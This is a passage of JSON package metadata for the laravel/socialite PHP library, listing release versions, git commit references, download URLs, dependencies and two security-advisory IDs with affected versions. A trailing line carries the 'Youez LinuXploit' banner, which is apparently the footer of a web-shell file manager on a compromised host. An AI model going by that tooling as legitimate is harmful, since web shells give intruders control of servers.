ravel\\Socialite\\Facades\\Socialite"}}}},{"version":"v4.3.0","version_normalized":"4.3.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"dc65eb73c48b866854822b603e8ebe80a58ba033"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/dc65eb73c48b866854822b603e8ebe80a58ba033","type":"zip","shasum":"","reference":"dc65eb73c48b866854822b603e8ebe80a58ba033"},"time":"2019-11-19T16:39:40+00:00"},{"version":"v4.2.0","version_normalized":"4.2.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"f509d06e1e7323997b804c5152874f8aad4508e9"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/f509d06e1e7323997b804c5152874f8aad4508e9","type":"zip","shasum":"","reference":"f509d06e1e7323997b804c5152874f8aad4508e9"},"time":"2019-09-03T15:27:17+00:00"},{"version":"v4.1.4","version_normalized":"4.1.4.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"ab5974b13b775e14d11f220064a110d60743eee0"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/ab5974b13b775e14d11f220064a110d60743eee0","type":"zip","shasum":"","reference":"ab5974b13b775e14d11f220064a110d60743eee0"},"time":"2019-07-30T16:07:14+00:00","require":{"php":"^7.1.3","ext-json":"*","guzzlehttp/guzzle":"~6.0","illuminate/http":"~5.7.0|~5.8.0|^6.0","illuminate/support":"~5.7.0|~5.8.0|^6.0","league/oauth1-client":"~1.0"},"require-dev":{"illuminate/contracts":"~5.7.0|~5.8.0|^6.0","mockery/mockery":"~1.0","phpunit/phpunit":"~7.0"}},{"version":"v4.1.3","version_normalized":"4.1.3.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"f92e15a8ba4dfd730cddc775a7c1ca2251f30cff"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/f92e15a8ba4dfd730cddc775a7c1ca2251f30cff","type":"zip","shasum":"","reference":"f92e15a8ba4dfd730cddc775a7c1ca2251f30cff"},"time":"2019-04-02T17:06:04+00:00","require":{"php":"^7.1.3","ext-json":"*","guzzlehttp/guzzle":"~6.0","illuminate/http":"~5.7.0|~5.8.0|~5.9.0","illuminate/support":"~5.7.0|~5.8.0|~5.9.0","league/oauth1-client":"~1.0"},"require-dev":{"illuminate/contracts":"~5.7.0|~5.8.0|~5.9.0","mockery/mockery":"~1.0","phpunit/phpunit":"~7.0"}},{"version":"v4.1.2","version_normalized":"4.1.2.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"0bb624e7e52c1858240c783a5418b8dcc5a7c2d1"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/0bb624e7e52c1858240c783a5418b8dcc5a7c2d1","type":"zip","shasum":"","reference":"0bb624e7e52c1858240c783a5418b8dcc5a7c2d1"},"time":"2019-03-15T12:39:01+00:00","require":{"php":"^7.1.3","ext-json":"*","guzzlehttp/guzzle":"~6.0","illuminate/contracts":"~5.7.0|~5.8.0","illuminate/http":"~5.7.0|~5.8.0","illuminate/support":"~5.7.0|~5.8.0","league/oauth1-client":"~1.0"},"require-dev":{"mockery/mockery":"~1.0","phpunit/phpunit":"~7.0"}},{"version":"4.1.1","version_normalized":"4.1.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"1d470d95c7506eb391c48bc3cda6be5ded3e593f"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/1d470d95c7506eb391c48bc3cda6be5ded3e593f","type":"zip","shasum":"","reference":"1d470d95c7506eb391c48bc3cda6be5ded3e593f"},"time":"2019-03-12T16:42:59+00:00"},{"version":"v4.1.0","version_normalized":"4.1.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"7581c57a60742f423a68362c79d507028f989bd7"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/7581c57a60742f423a68362c79d507028f989bd7","type":"zip","shasum":"","reference":"7581c57a60742f423a68362c79d507028f989bd7"},"time":"2019-02-14T16:57:39+00:00"},{"version":"v4.0.3","version_normalized":"4.0.3.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"25eea36010c4e714c58a4792ef52b0a8e8a9c21c"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/25eea36010c4e714c58a4792ef52b0a8e8a9c21c","type":"zip","shasum":"","reference":"25eea36010c4e714c58a4792ef52b0a8e8a9c21c"},"time":"2019-01-21T12:35:13+00:00","require":{"php":"^7.1.3","ext-json":"*","guzzlehttp/guzzle":"~6.0","illuminate/contracts":"~5.7","illuminate/http":"~5.7","illuminate/support":"~5.7","league/oauth1-client":"~1.0"}},{"version":"v4.0.2","version_normalized":"4.0.2.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"ed5cc1dfc6d971726090163c239ff4b3c6d1a15e"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/ed5cc1dfc6d971726090163c239ff4b3c6d1a15e","type":"zip","shasum":"","reference":"ed5cc1dfc6d971726090163c239ff4b3c6d1a15e"},"time":"2019-01-21T11:07:35+00:00"},{"version":"v4.0.1","version_normalized":"4.0.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"ad71c2691b04d843e24608ca13d9e004a34907d0"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/ad71c2691b04d843e24608ca13d9e004a34907d0","type":"zip","shasum":"","reference":"ad71c2691b04d843e24608ca13d9e004a34907d0"},"time":"2018-12-20T11:14:43+00:00"},{"version":"v4.0.0","version_normalized":"4.0.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"ecc3ccfdcbbcee9e19468539985f0d0fddd4dbde"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/ecc3ccfdcbbcee9e19468539985f0d0fddd4dbde","type":"zip","shasum":"","reference":"ecc3ccfdcbbcee9e19468539985f0d0fddd4dbde"},"time":"2018-12-18T13:42:49+00:00"},{"version":"v3.4.0","version_normalized":"3.4.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"28368c6fc6580ca1860f9b9a7f8deac1aa7d515a"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/28368c6fc6580ca1860f9b9a7f8deac1aa7d515a","type":"zip","shasum":"","reference":"28368c6fc6580ca1860f9b9a7f8deac1aa7d515a"},"funding":[],"time":"2020-02-20T18:31:32+00:00","extra":{"branch-alias":{"dev-master":"3.0-dev"},"laravel":{"providers":["Laravel\\Socialite\\SocialiteServiceProvider"],"aliases":{"Socialite":"Laravel\\Socialite\\Facades\\Socialite"}}},"require":{"php":">=5.6.4","guzzlehttp/guzzle":"~6.0","illuminate/contracts":"~5.4","illuminate/http":"~5.4","illuminate/support":"~5.4","league/oauth1-client":"~1.0"},"require-dev":{"mockery/mockery":"~0.9","phpunit/phpunit":"~4.0|~5.0"}},{"version":"v3.3.0","version_normalized":"3.3.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"79316f36641f1916a50ab14d368acdf1d97e46de"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/79316f36641f1916a50ab14d368acdf1d97e46de","type":"zip","shasum":"","reference":"79316f36641f1916a50ab14d368acdf1d97e46de"},"time":"2018-12-21T14:06:32+00:00","funding":"__unset"},{"version":"v3.2.0","version_normalized":"3.2.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"7194c0cd9fb2ce449669252b8ec316b85b7de481"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/7194c0cd9fb2ce449669252b8ec316b85b7de481","type":"zip","shasum":"","reference":"7194c0cd9fb2ce449669252b8ec316b85b7de481"},"time":"2018-10-18T03:39:04+00:00"},{"version":"v3.1.1","version_normalized":"3.1.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"65f771ff4f266ebae23de1a3f18efd80a1da2f8d"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/65f771ff4f266ebae23de1a3f18efd80a1da2f8d","type":"zip","shasum":"","reference":"65f771ff4f266ebae23de1a3f18efd80a1da2f8d"},"time":"2018-08-16T12:51:21+00:00"},{"version":"v3.1.0","version_normalized":"3.1.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"eeb666a5ca0dac7fa5a59b67841bc203fcd5c901"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/eeb666a5ca0dac7fa5a59b67841bc203fcd5c901","type":"zip","shasum":"","reference":"eeb666a5ca0dac7fa5a59b67841bc203fcd5c901"},"time":"2018-08-15T13:21:36+00:00"},{"homepage":"","version":"v3.0.12","version_normalized":"3.0.12.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"b5f465847b1d637efa86bbfe2fc1c9d2bd12f60f"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/b5f465847b1d637efa86bbfe2fc1c9d2bd12f60f","type":"zip","shasum":"","reference":"b5f465847b1d637efa86bbfe2fc1c9d2bd12f60f"},"support":{"source":"https://github.com/laravel/socialite/tree/3.0"},"time":"2018-06-01T15:06:47+00:00","require":{"php":">=5.4.0","guzzlehttp/guzzle":"~6.0","illuminate/contracts":"~5.4","illuminate/http":"~5.4","illuminate/support":"~5.4","league/oauth1-client":"~1.0"}},{"version":"v3.0.11","version_normalized":"3.0.11.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"4d29ba66fdb38ec994b778e5e51657555cc10511"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/4d29ba66fdb38ec994b778e5e51657555cc10511","type":"zip","shasum":"","reference":"4d29ba66fdb38ec994b778e5e51657555cc10511"},"time":"2018-05-12T17:44:53+00:00"},{"version":"v3.0.10","version_normalized":"3.0.10.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"647ee1b1b7520e16c661b4df5cdff1d7f6902eee"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/647ee1b1b7520e16c661b4df5cdff1d7f6902eee","type":"zip","shasum":"","reference":"647ee1b1b7520e16c661b4df5cdff1d7f6902eee"},"time":"2017-12-05T13:46:36+00:00"},{"version":"v3.0.9","version_normalized":"3.0.9.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"fc1c8d415699e502f3e61cbc61e3250d5bd942eb"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/fc1c8d415699e502f3e61cbc61e3250d5bd942eb","type":"zip","shasum":"","reference":"fc1c8d415699e502f3e61cbc61e3250d5bd942eb"},"time":"2017-11-06T16:02:48+00:00"},{"version":"v3.0.8","version_normalized":"3.0.8.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"60ef8825bdab4f5dc7460ea467040a11f534e9db"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/60ef8825bdab4f5dc7460ea467040a11f534e9db","type":"zip","shasum":"","reference":"60ef8825bdab4f5dc7460ea467040a11f534e9db"},"time":"2017-08-23T13:06:48+00:00"},{"version":"v3.0.7","version_normalized":"3.0.7.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"d79174513dbf14359b53e44394cf71373ae03433"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/d79174513dbf14359b53e44394cf71373ae03433","type":"zip","shasum":"","reference":"d79174513dbf14359b53e44394cf71373ae03433"},"time":"2017-07-22T14:44:37+00:00"},{"version":"v3.0.6","version_normalized":"3.0.6.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"bca777a8526983e0ebdf3350f1b6e031923a473b"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/bca777a8526983e0ebdf3350f1b6e031923a473b","type":"zip","shasum":"","reference":"bca777a8526983e0ebdf3350f1b6e031923a473b"},"time":"2017-05-05T14:17:11+00:00","extra":{"branch-alias":{"dev-master":"3.0-dev"}}},{"version":"v3.0.5","version_normalized":"3.0.5.0","authors":[{"name":"Taylor Otwell","email":"taylorotwell@gmail.com"}],"source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"2771ab96004b6149d0974f8a469e08c8e54474a5"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/2771ab96004b6149d0974f8a469e08c8e54474a5","type":"zip","shasum":"","reference":"2771ab96004b6149d0974f8a469e08c8e54474a5"},"time":"2017-04-20T16:24:07+00:00"},{"version":"v3.0.4","version_normalized":"3.0.4.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"441e0d467319044e4913b1748382d427795416e9"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/441e0d467319044e4913b1748382d427795416e9","type":"zip","shasum":"","reference":"441e0d467319044e4913b1748382d427795416e9"},"time":"2017-03-27T19:43:19+00:00"},{"version":"v3.0.3","version_normalized":"3.0.3.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"01588748beef55ad5dd4f172d235548d3a6be79a"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/01588748beef55ad5dd4f172d235548d3a6be79a","type":"zip","shasum":"","reference":"01588748beef55ad5dd4f172d235548d3a6be79a"},"time":"2017-02-01T13:43:56+00:00","require":{"php":">=5.4.0","illuminate/contracts":"~5.4","illuminate/http":"~5.4","illuminate/support":"~5.4","guzzlehttp/guzzle":"~6.0","league/oauth1-client":"~1.0"}},{"version":"v3.0.2","version_normalized":"3.0.2.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"d3aaffa5e122395e54eb2c26062fde3a848c40fd"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/d3aaffa5e122395e54eb2c26062fde3a848c40fd","type":"zip","shasum":"","reference":"d3aaffa5e122395e54eb2c26062fde3a848c40fd"},"time":"2017-01-25T17:58:13+00:00"},{"version":"v3.0.0","version_normalized":"3.0.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"9f23589476ed433e4e1a7faa1c1fb8c834870dac"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/9f23589476ed433e4e1a7faa1c1fb8c834870dac","type":"zip","shasum":"","reference":"9f23589476ed433e4e1a7faa1c1fb8c834870dac"},"support":{"source":"https://github.com/laravel/socialite/tree/master"},"time":"2017-01-16T14:00:04+00:00","require-dev":{"mockery/mockery":"~0.9","phpunit/phpunit":"~4.0"}},{"version":"v2.0.22","version_normalized":"2.0.22.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"67154ff06a43169a2efa28d870344a3a61c36bee"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/67154ff06a43169a2efa28d870344a3a61c36bee","type":"zip","shasum":"","reference":"67154ff06a43169a2efa28d870344a3a61c36bee"},"support":{"issues":"https://github.com/laravel/socialite/issues","source":"https://github.com/laravel/socialite/tree/2.0"},"time":"2019-02-14T10:19:54+00:00","require":{"php":">=5.4.0","guzzlehttp/guzzle":"~5.0|~6.0","illuminate/contracts":"~5.0","illuminate/http":"~5.0","illuminate/support":"~5.0","league/oauth1-client":"~1.0"},"require-dev":{"mockery/mockery":"~0.9","phpunit/phpunit":"~4.0|~5.0"}},{"version":"v2.0.21","version_normalized":"2.0.21.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"c4e4337e5b70149fdbefbb95b2c9e93d0749c413"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/c4e4337e5b70149fdbefbb95b2c9e93d0749c413","type":"zip","shasum":"","reference":"c4e4337e5b70149fdbefbb95b2c9e93d0749c413"},"support":{"source":"https://github.com/laravel/socialite/tree/2.0"},"time":"2017-03-27T21:32:28+00:00"},{"version":"v2.0.20","version_normalized":"2.0.20.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"aca8de9a93a28a119714e289c8bc599bd81aa88d"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/aca8de9a93a28a119714e289c8bc599bd81aa88d","type":"zip","shasum":"","reference":"aca8de9a93a28a119714e289c8bc599bd81aa88d"},"time":"2016-11-01T18:49:10+00:00"},{"version":"v2.0.19","version_normalized":"2.0.19.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"4efbdb1e9e45ee0d21d1bc1ad35370c0eee5adb2"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/4efbdb1e9e45ee0d21d1bc1ad35370c0eee5adb2","type":"zip","shasum":"","reference":"4efbdb1e9e45ee0d21d1bc1ad35370c0eee5adb2"},"time":"2016-10-24T13:06:51+00:00"},{"version":"v2.0.18","version_normalized":"2.0.18.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"76ee5397fcdea5a062361392abca4eb397e519a3"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/76ee5397fcdea5a062361392abca4eb397e519a3","type":"zip","shasum":"","reference":"76ee5397fcdea5a062361392abca4eb397e519a3"},"time":"2016-06-22T12:40:16+00:00"},{"version":"v2.0.17","version_normalized":"2.0.17.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"81d39cde2226f7548d8d1aa99405278c87e50737"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/81d39cde2226f7548d8d1aa99405278c87e50737","type":"zip","shasum":"","reference":"81d39cde2226f7548d8d1aa99405278c87e50737"},"time":"2016-05-27T12:42:05+00:00","require":{"php":">=5.4.0","illuminate/contracts":"~5.0","illuminate/http":"~5.0","illuminate/support":"~5.0","guzzlehttp/guzzle":"~5.0|~6.0","league/oauth1-client":"~1.0"},"require-dev":{"mockery/mockery":"~0.9","phpunit/phpunit":"~4.0"}},{"version":"v2.0.16","version_normalized":"2.0.16.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"f3e3bdf9368b96b82635cb88ab02944b7d036669"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/f3e3bdf9368b96b82635cb88ab02944b7d036669","type":"zip","shasum":"","reference":"f3e3bdf9368b96b82635cb88ab02944b7d036669"},"time":"2016-05-25T12:58:08+00:00"},{"version":"v2.0.15","version_normalized":"2.0.15.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"edd00ab96933e3ef053533cce81e958fb26921af"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/edd00ab96933e3ef053533cce81e958fb26921af","type":"zip","shasum":"","reference":"edd00ab96933e3ef053533cce81e958fb26921af"},"time":"2016-03-21T14:30:30+00:00"},{"version":"v2.0.14","version_normalized":"2.0.14.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"b15f4be0ac739405120d74b837af423aa71502d9"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/b15f4be0ac739405120d74b837af423aa71502d9","type":"zip","shasum":"","reference":"b15f4be0ac739405120d74b837af423aa71502d9"},"time":"2015-10-16T15:39:46+00:00"},{"version":"v2.0.13","version_normalized":"2.0.13.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"5995d2c9c60b47362412a84286e2a0707e0db386"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/5995d2c9c60b47362412a84286e2a0707e0db386","type":"zip","shasum":"","reference":"5995d2c9c60b47362412a84286e2a0707e0db386"},"time":"2015-09-24T20:59:56+00:00"},{"version":"v2.0.12","version_normalized":"2.0.12.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"0bb08c8666f4c01e55e3b3b0e42f2b5075be6a6e"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/0bb08c8666f4c01e55e3b3b0e42f2b5075be6a6e","type":"zip","shasum":"","reference":"0bb08c8666f4c01e55e3b3b0e42f2b5075be6a6e"},"time":"2015-08-30T01:12:56+00:00"},{"version":"v2.0.11","version_normalized":"2.0.11.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"8a9e4b61f5078ca1c10fb608d76e845825ca5a3b"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/8a9e4b61f5078ca1c10fb608d76e845825ca5a3b","type":"zip","shasum":"","reference":"8a9e4b61f5078ca1c10fb608d76e845825ca5a3b"},"time":"2015-08-14T20:44:20+00:00"},{"version":"v2.0.10","version_normalized":"2.0.10.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"b36860a599669a80b45216ee9d3b39083dc767fe"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/b36860a599669a80b45216ee9d3b39083dc767fe","type":"zip","shasum":"","reference":"b36860a599669a80b45216ee9d3b39083dc767fe"},"time":"2015-08-03T12:55:40+00:00","extra":{"branch-alias":{"dev-master":"2.0-dev"}}},{"version":"v2.0.9","version_normalized":"2.0.9.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"feea1b456fc93930b4afe8c264142b74509bd943"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/feea1b456fc93930b4afe8c264142b74509bd943","type":"zip","shasum":"","reference":"feea1b456fc93930b4afe8c264142b74509bd943"},"time":"2015-07-23T13:53:32+00:00"},{"version":"v2.0.8","version_normalized":"2.0.8.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"2f77e4f4bc16a7984ab6f30409bdd05c55f9159c"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/2f77e4f4bc16a7984ab6f30409bdd05c55f9159c","type":"zip","shasum":"","reference":"2f77e4f4bc16a7984ab6f30409bdd05c55f9159c"},"time":"2015-07-09T23:55:17+00:00"},{"version":"v2.0.7","version_normalized":"2.0.7.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"75e6275c5aaac8ddc9ab49f445c11cf1f9468396"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/75e6275c5aaac8ddc9ab49f445c11cf1f9468396","type":"zip","shasum":"","reference":"75e6275c5aaac8ddc9ab49f445c11cf1f9468396"},"time":"2015-06-30T15:59:08+00:00"},{"version":"v2.0.6","version_normalized":"2.0.6.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"31685e257ad092fb1a37f9d5d0d87f343e63c568"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/31685e257ad092fb1a37f9d5d0d87f343e63c568","type":"zip","shasum":"","reference":"31685e257ad092fb1a37f9d5d0d87f343e63c568"},"time":"2015-06-18T16:36:42+00:00"},{"version":"v2.0.5","version_normalized":"2.0.5.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"15f36da073454d630bac20afef815aa9cfa4cf8f"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/15f36da073454d630bac20afef815aa9cfa4cf8f","type":"zip","shasum":"","reference":"15f36da073454d630bac20afef815aa9cfa4cf8f"},"time":"2015-06-03T18:14:09+00:00"},{"version":"v2.0.4","version_normalized":"2.0.4.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"3d5f6560f8642c4973b5e54a67b1368ee81ff24d"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/3d5f6560f8642c4973b5e54a67b1368ee81ff24d","type":"zip","shasum":"","reference":"3d5f6560f8642c4973b5e54a67b1368ee81ff24d"},"time":"2015-03-13T02:40:10+00:00","require":{"php":">=5.4.0","illuminate/contracts":"~5.0","illuminate/http":"~5.0","illuminate/support":"~5.0","guzzlehttp/guzzle":"~4.0|~5.0","league/oauth1-client":"~1.0"}},{"version":"v2.0.3","version_normalized":"2.0.3.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"4ca0e2868fdfd3156c02c0d5c5612cbd8fa9b124"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/4ca0e2868fdfd3156c02c0d5c5612cbd8fa9b124","type":"zip","shasum":"","reference":"4ca0e2868fdfd3156c02c0d5c5612cbd8fa9b124"},"time":"2015-02-24T20:20:48+00:00"},{"version":"v2.0.2","version_normalized":"2.0.2.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"5ecfde2b908f99d21545a1be385fbd6f78e6444c"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/5ecfde2b908f99d21545a1be385fbd6f78e6444c","type":"zip","shasum":"","reference":"5ecfde2b908f99d21545a1be385fbd6f78e6444c"},"time":"2015-02-20T20:07:14+00:00"},{"version":"v2.0.1","version_normalized":"2.0.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"7f96a35e8976faea4c282abcd5c196ef8ddfab7c"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/7f96a35e8976faea4c282abcd5c196ef8ddfab7c","type":"zip","shasum":"","reference":"7f96a35e8976faea4c282abcd5c196ef8ddfab7c"},"time":"2015-02-14T01:56:05+00:00"},{"version":"v2.0.0","version_normalized":"2.0.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"ca028df357d9585be55ec2db48f591dbbfbdd3cf"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/ca028df357d9585be55ec2db48f591dbbfbdd3cf","type":"zip","shasum":"","reference":"ca028df357d9585be55ec2db48f591dbbfbdd3cf"},"time":"2015-01-23T19:59:22+00:00","require":{"php":">=5.4.0","illuminate/contracts":"~5.0","illuminate/http":"~5.0","illuminate/support":"~5.0","guzzlehttp/guzzle":"~4.0","league/oauth1-client":"~1.0"}},{"version":"v1.0.3","version_normalized":"1.0.3.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"647bdd9250786cf7962e9489a3162e56396fd6b9"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/647bdd9250786cf7962e9489a3162e56396fd6b9","type":"zip","shasum":"","reference":"647bdd9250786cf7962e9489a3162e56396fd6b9"},"support":{"source":"https://github.com/laravel/socialite/tree/master"},"time":"2014-08-29T00:53:37+00:00","extra":{"branch-alias":{"dev-master":"1.0-dev"}},"require":{"php":">=5.4.0","illuminate/contracts":"~4.3","illuminate/http":"~4.3","illuminate/support":"~4.3","guzzlehttp/guzzle":"~4.0","league/oauth1-client":"~1.0"}},{"version":"v1.0.2","version_normalized":"1.0.2.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"726d85fd5504cd608d8d8dcdc7861153472f634f"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/726d85fd5504cd608d8d8dcdc7861153472f634f","type":"zip","shasum":"","reference":"726d85fd5504cd608d8d8dcdc7861153472f634f"},"time":"2014-08-28T12:15:07+00:00"},{"version":"v1.0.1","version_normalized":"1.0.1.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"f1dbf88af2998fc6a92a399e1c71b7cb97c7afb4"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/f1dbf88af2998fc6a92a399e1c71b7cb97c7afb4","type":"zip","shasum":"","reference":"f1dbf88af2998fc6a92a399e1c71b7cb97c7afb4"},"time":"2014-08-28T11:45:54+00:00","extra":"__unset"},{"version":"v1.0.0","version_normalized":"1.0.0.0","source":{"url":"https://github.com/laravel/socialite.git","type":"git","reference":"606c9d1d10f213dda72bc85107298a7f894d9afb"},"dist":{"url":"https://api.github.com/repos/laravel/socialite/zipball/606c9d1d10f213dda72bc85107298a7f894d9afb","type":"zip","shasum":"","reference":"606c9d1d10f213dda72bc85107298a7f894d9afb"},"time":"2014-08-24T00:04:37+00:00"}]},"security-advisories":[{"advisoryId":"PKSA-w44j-vqkg-wtvj","affectedVersions":">=1.0.0,<1.0.99|>=2.0.0,<2.0.9"},{"advisoryId":"PKSA-633b-bdtt-33gv","affectedVersions":">=1.0.0,<1.0.99|>=2.0.0,<2.0.10"}],"last-modified":"Tue, 03 Sep 2024 15:32:42 GMT"}

Youez - 2016 - github.com/yon3zu
LinuXploit